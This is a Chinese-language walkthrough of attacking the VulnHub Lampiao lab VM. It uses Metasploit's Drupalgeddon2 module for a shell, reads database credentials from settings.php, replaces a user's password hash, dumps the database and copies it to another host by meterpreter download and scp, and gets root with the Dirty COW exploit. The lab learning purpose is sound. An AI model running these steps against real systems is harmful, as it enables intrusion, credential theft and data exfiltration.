Lampiao

VulnHub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行。

本次我们对其中Lampiao靶机进行渗透学习。

由于目标靶机是在本地部署进行测试的,所以直接对C段进行扫描即可。

探测靶机的 IP 地址
arp-scan –interface=eth0 –localnet
netdiscover -i eth0 -r 192.168.184.0/24
nmap -sP 192.168.184.0/24

获取靶机端口服务等详细信息
nmap -p- -A 192.168.184.132

Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。
直接使用强大的渗透工具 MSF 进行攻击。
msfconsole

进入msfconsole后,需要进行相关的攻击操作获得shell,此时的shell为meterpreter shell。

搜索drupal框架相关漏洞
search drupal

装载攻击模块、设置靶机 IP 和端口后,启动利用过程
use exploit/unix/webapp/drupal_drupalgeddon2
set rhosts 192.168.184.132
set rport 1898
set LHOST 192.168.184.150
exploit

到此是成功拿到meterpreter shell。

进入linux原生shell
shell

进入到linux原生shell后,使用pty模块创建了原生终端,建立交互式 shell
python -c ‘import pty;pty.spawn(“/bin/bash”)’

使用 exit 可以回退到上一级 shell 。

可以找到存有mysql数据库连接信息的配置文件
cat /var/www/html/sites/default/settings.php

1
2
3
'database' => 'drupal',
'username' => 'drupaluser',
'password' => 'Virgulino',

可以利用其密码加密脚本对自己的密码加密后,替换原来数据库中的密码,注意要记录之前的密码,以便于渗透测试完成后还原。

访问数据库
mysql -udrupaluser -pVirgulino

数据库口令字段加密脚本文件
cat scripts/password-hash.sh

运行加密脚本文件
php scripts/password-hash.sh 123456

修改数据库
update users set pass=”$S$DH4HqENQ6xX/asHITshPJl4ixv.hJT1FbKjBq98VYaDNMMPDIVeX” where name=”tiago”;

也可以在/tmp目录下进行拖库操作
mysqldump -udrupaluser -pVirgulino drupal > drupal.sql

打包
tar zcvf drupal.tar.gz drupal.sql

下载到本机(在 meterpreter shell 中操作)
download /tmp/drupal.tar.gz /root

发送给另外一个机器
scp drupal.tar.gz 192.168.184.200:/root/

解压
tar -xvf drupal.tar.gz

导入数据库
mysql -uroot -p drupal < drupal.sql

也可以利用脏牛漏洞做提权操作

查看靶机系统版本
uname -a

查看靶机发行版本
lsb_release -a

查寻“脏牛”漏洞利用程序
searchsploit dirty

上传利用程序到靶机(在 meterpreter shell 中操作)
upload /usr/share/exploitdb/exploits/linux/local/40847.cpp /tmp

编译利用程序
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dirty /tmp/40847.cpp -lutil

运行编译后的程序提权
./dirty

提权
su